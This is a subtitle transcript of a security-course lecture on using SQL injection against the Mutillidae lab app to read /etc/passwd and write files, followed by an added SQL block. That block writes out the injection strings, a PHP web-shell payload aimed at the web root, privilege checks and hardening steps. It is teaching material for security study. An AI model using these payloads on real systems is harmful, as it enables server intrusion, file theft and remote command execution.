1
00:00:01,937  -->  00:00:03,080
<v Instructor>In this lecture,</v>

2
00:00:03,080  -->  00:00:06,490
I'd like to show you how we can use SQL injections

3
00:00:06,490  -->  00:00:08,900
to read any file on the server

4
00:00:08,900  -->  00:00:12,370
so even if the file exists outside the www root,

5
00:00:12,370  -->  00:00:14,360
we'll be able to read it exactly

6
00:00:14,360  -->  00:00:16,970
like a file disclosure vulnerability

7
00:00:16,970  -->  00:00:19,160
and we'll also see how we can use it

8
00:00:19,160  -->  00:00:22,110
to write files and upload them to the system

9
00:00:22,110  -->  00:00:25,050
just like a file upload vulnerability.

10
00:00:25,050  -->  00:00:27,730
So the first thing we're going to have a look at

11
00:00:27,730  -->  00:00:29,773
is reading the file.

12
00:00:30,610  -->  00:00:32,410
And I'm gonna set everything to null here.

13
00:00:32,410  -->  00:00:34,050
So I have my statement here

14
00:00:34,050  -->  00:00:36,010
and I'm gonna set select one,

15
00:00:36,010  -->  00:00:37,120
and I'm gonna leave number two

16
00:00:37,120  -->  00:00:39,340
'cause I'm gonna do stuff on that.

17
00:00:39,340  -->  00:00:42,530
And we're gonna do another three nulls here.

18
00:00:42,530  -->  00:00:44,023
So null,

19
00:00:46,120  -->  00:00:47,680
null,

20
00:00:47,680  -->  00:00:48,513
null.

21
00:00:48,513  -->  00:00:51,440
So we have select null, something, null, null, null.

22
00:00:51,440  -->  00:00:54,040
So five because we have five records

23
00:00:54,040  -->  00:00:56,240
when we did the order by.

24
00:00:56,240  -->  00:00:58,910
And instead of selecting something,

25
00:00:58,910  -->  00:01:00,490
remember, in the third video,

26
00:01:00,490  -->  00:01:04,330
we did select database, for example,

27
00:01:04,330  -->  00:01:06,370
and it shows us the current database.

28
00:01:06,370  -->  00:01:07,250
What I wanna do now

29
00:01:07,250  -->  00:01:09,270
is I wanna do another function

30
00:01:09,270  -->  00:01:11,170
and that function is called load_file.

31
00:01:15,190  -->  00:01:18,010
And in here, I'm gonna set the file

32
00:01:18,010  -->  00:01:20,910
that I wanna load and I'm gonna use the same file

33
00:01:20,910  -->  00:01:21,890
that we had the look on

34
00:01:21,890  -->  00:01:24,350
in the file inclusion vulnerability

35
00:01:24,350  -->  00:01:27,663
and it was etc/passwd.

36
00:01:28,830  -->  00:01:30,800
So we're trying to read that file

37
00:01:30,800  -->  00:01:35,670
and our statement is union select that file and that's it.

38
00:01:35,670  -->  00:01:37,003
So I'm gonna copy this.

39
00:01:38,230  -->  00:01:39,840
And I'm gonna inject it here

40
00:01:39,840  -->  00:01:42,190
and I'm gonna add my %23

41
00:01:42,190  -->  00:01:44,533
which is my comment.

42
00:01:47,770  -->  00:01:49,050
And as you can see,

43
00:01:49,050  -->  00:01:51,410
we managed to read all the information,

44
00:01:51,410  -->  00:01:54,570
all the content of etc/passwd

45
00:01:55,450  -->  00:01:57,210
even though it's not in the web root.

46
00:01:57,210  -->  00:01:58,960
So it's stored in etc/passwd.

47
00:01:58,960  -->  00:02:01,360
So we can read anything on the server

48
00:02:01,360  -->  00:02:02,420
from other websites,

49
00:02:02,420  -->  00:02:04,580
from other files anywhere on the server,

50
00:02:04,580  -->  00:02:05,510
we can read it

51
00:02:05,510  -->  00:02:08,063
by specifying the full path of that file.

52
00:02:10,260  -->  00:02:12,010
The next thing I'd like to show you

53
00:02:13,000  -->  00:02:15,380
is writing to the server.

54
00:02:15,380  -->  00:02:17,540
So we're actually going to write stuff

55
00:02:17,540  -->  00:02:19,350
to the server and this is very useful

56
00:02:19,350  -->  00:02:23,110
because you'd be able to write any code you want,

57
00:02:23,110  -->  00:02:26,850
so for example, you can write the code for a PHP script,

58
00:02:26,850  -->  00:02:30,691
you can write the code of a shell, a virus

59
00:02:30,691  -->  00:02:33,560
or a PHP code to get other connections to you.

60
00:02:33,560  -->  00:02:35,030
So it'll basically just act

61
00:02:35,030  -->  00:02:37,870
like a file upload vulnerability.

62
00:02:37,870  -->  00:02:39,040
And to do that,

63
00:02:39,040  -->  00:02:41,340
I'm going to write the code that I want to do here

64
00:02:41,340  -->  00:02:43,100
and I'm gonna call that, for example,

65
00:02:43,100  -->  00:02:46,053
just example example.

66
00:02:47,490  -->  00:02:51,950
And we're going to use a function called outfile

67
00:02:51,950  -->  00:02:53,867
so we're gonna do into outfile

68
00:02:55,740  -->  00:02:57,420
and then we're gonna specify

69
00:02:57,420  -->  00:02:59,610
where we want to store that file.

70
00:02:59,610  -->  00:03:01,480
Now, in best case scenarios,

71
00:03:01,480  -->  00:03:04,210
you'd be able to write to your web root

72
00:03:04,210  -->  00:03:06,740
and that will mean that you can access the file

73
00:03:06,740  -->  00:03:08,690
through the browser and execute it,

74
00:03:08,690  -->  00:03:11,610
so you can upload a Weevely file

75
00:03:11,610  -->  00:03:12,750
and then connect to it

76
00:03:12,750  -->  00:03:14,530
and do stuff like that.

77
00:03:14,530  -->  00:03:16,120
So let's try to do that first.

78
00:03:16,120  -->  00:03:20,350
So we're gonna do it in var/www

79
00:03:20,350  -->  00:03:22,730
and that's our web root so we'll be able

80
00:03:22,730  -->  00:03:24,010
to access things through it

81
00:03:24,010  -->  00:03:27,640
or you can put it even var/www

82
00:03:27,640  -->  00:03:29,260
and then put mutillidae after it

83
00:03:30,820  -->  00:03:32,233
to store it in there.

84
00:03:34,190  -->  00:03:35,470
So the command is very simple.

85
00:03:35,470  -->  00:03:36,940
Again union select.

86
00:03:36,940  -->  00:03:38,460
Make sure you set everything to null

87
00:03:38,460  -->  00:03:41,160
so that nothing gets written to the file

88
00:03:41,160  -->  00:03:42,670
except what you put in here

89
00:03:42,670  -->  00:03:44,730
and I put example example

90
00:03:44,730  -->  00:03:47,050
and it's gonna be stored into our file

91
00:03:47,050  -->  00:03:49,520
in var/www/mutillidae

92
00:03:49,520  -->  00:03:53,137
and call that example.txt.

93
00:03:57,540  -->  00:03:59,733
Let's try to run this and see if it works.

94
00:04:12,630  -->  00:04:14,390
Now, this didn't work.

95
00:04:14,390  -->  00:04:15,800
And if you come down here,

96
00:04:15,800  -->  00:04:20,477
you'll see that SQL or MySQL

97
00:04:20,477  -->  00:04:24,330
is not allowed to create or write to this directory.

98
00:04:24,330  -->  00:04:26,550
So the problem is we're not,

99
00:04:26,550  -->  00:04:28,420
the permissions that we have

100
00:04:28,420  -->  00:04:32,830
don't allow us to write to this particular location.

101
00:04:32,830  -->  00:04:34,410
So just to test this exploit,

102
00:04:34,410  -->  00:04:37,690
I'm going to change this location to tmp

103
00:04:37,690  -->  00:04:38,660
which is the temp

104
00:04:39,510  -->  00:04:42,150
and you'll see that you can actually write to temp

105
00:04:42,150  -->  00:04:43,983
so in real-life scenarios,

106
00:04:43,983  -->  00:04:46,300
it depends, you can try it and see if you're able

107
00:04:46,300  -->  00:04:48,080
to write stuff or not.

108
00:04:48,080  -->  00:04:50,770
In this, we're trying to write to temp now

109
00:04:50,770  -->  00:04:52,163
and if we read in temp,

110
00:04:54,030  -->  00:04:55,610
if we clear that

111
00:04:55,610  -->  00:05:00,023
and then ls and /tmp

112
00:05:02,370  -->  00:05:04,720
you'll see that we have something called example

113
00:05:04,720  -->  00:05:07,020
and if you try to read that,

114
00:05:07,020  -->  00:05:10,030
you'll see that it contains,

115
00:05:10,030  -->  00:05:11,060
obviously it contains

116
00:05:11,060  -->  00:05:13,770
the content of what we did before

117
00:05:13,770  -->  00:05:18,060
which was the normal selection that you'd see.

118
00:05:18,060  -->  00:05:22,170
So what you see for putting the stuff for admin

119
00:05:22,170  -->  00:05:24,350
and then it showed us what's in there

120
00:05:24,350  -->  00:05:26,090
which is example example

121
00:05:26,090  -->  00:05:28,523
which is what we wanted to write to the file.

122
00:05:32,070  -->  00:05:33,970
Now you can obviously get rid of the admin

123
00:05:33,970  -->  00:05:35,450
and the adminpass stuff

124
00:05:35,450  -->  00:05:37,290
by just putting a wrong username

125
00:05:37,290  -->  00:05:39,410
and nothing's gonna be displayed here

126
00:05:39,410  -->  00:05:42,040
so the only thing that you'll see is the output

127
00:05:42,040  -->  00:05:45,290
which is example example.

128
00:05:45,290  -->  00:05:47,370
But again, this is only useful

129
00:05:47,370  -->  00:05:50,270
if you're able to write to your web server,

130
00:05:50,270  -->  00:05:51,850
so you can access it

131
00:05:51,850  -->  00:05:53,090
and then use your shell

132
00:05:53,090  -->  00:05:56,903
or use your payload and further exploit the system.
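The two injections walked through in this lecture, written out as an added example that is not part of the original video or the Mutillidae project. The five-column UNION, the column position used for the payload, the `#` comment (sent as `%23`), `/etc/passwd`, `/tmp/example.txt` and `/var/www/mutillidae` all come from the lecture; the privilege and `secure_file_priv` checks, and the web shell and hardening statements at the end, are additions and assume MySQL or MariaDB, since `LOAD_FILE()` and `INTO OUTFILE` are MySQL-specific.

```sql
-- Added example, not from the lecture. Assumes MySQL/MariaDB and an injectable
-- SELECT with five columns, as found with ORDER BY earlier in the course.

-- 1. Read a file from outside the web root. LOAD_FILE() needs the FILE
--    privilege and the mysqld OS user must be able to read the path.
--    Injected value for the username parameter, before URL-encoding
--    (the trailing # comments out the rest of the original query):
--      ' UNION SELECT NULL, LOAD_FILE('/etc/passwd'), NULL, NULL, NULL #
--    The same query as it reaches the server, minus the first half of the UNION:
SELECT NULL, LOAD_FILE('/etc/passwd'), NULL, NULL, NULL;

-- 2. Write a file. INTO OUTFILE also needs FILE, and is refused when the
--    directory is not writable by the mysqld user or lies outside
--    secure_file_priv; that is the "not allowed to create/write to file"
--    error the lecture hits for /var/www/mutillidae, while /tmp works.
--      ' UNION SELECT NULL, 'example example', NULL, NULL, NULL
--        INTO OUTFILE '/tmp/example.txt' #
SELECT NULL, 'example example', NULL, NULL, NULL
INTO OUTFILE '/tmp/example.txt';

--    Using a non-existent username in front of the UNION, as the lecture
--    suggests, makes the first half return no rows, so the file holds only
--    the payload row (NULLs are written as \N).

--    If the web root is writable, the same statement drops a PHP shell
--    that the browser will then execute (added illustration, not run here):
--      ' UNION SELECT NULL, '<?php system($_GET["cmd"]); ?>', NULL, NULL, NULL
--        INTO OUTFILE '/var/www/mutillidae/shell.php' #

-- 3. Checks that decide whether 1 and 2 can work at all. They can be run
--    through the same UNION injection, putting each expression in column 2.
SELECT @@secure_file_priv;   -- NULL: file I/O disabled; '': unrestricted; a path: only under it
SELECT CURRENT_USER();       -- which account the web app connects as
SHOW GRANTS;                 -- look for "GRANT FILE ON *.*" (or ALL PRIVILEGES)

-- 4. Hardening on the database side (assumed account name 'webapp'@'localhost'):
--    the web application's account should never hold FILE, and secure_file_priv
--    should point at a dedicated directory or be NULL. secure_file_priv is
--    read-only at runtime, so it goes in my.cnf under [mysqld]:
--      secure_file_priv = NULL
REVOKE FILE ON *.* FROM 'webapp'@'localhost';
```

Note that the application's own code has to be fixed too; parameterised queries remove the injection, and the database-side changes only limit what a remaining injection can do. Also keep in mind that `INTO OUTFILE` will not overwrite an existing file, so a second write to the same path fails even when the directory is writable.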
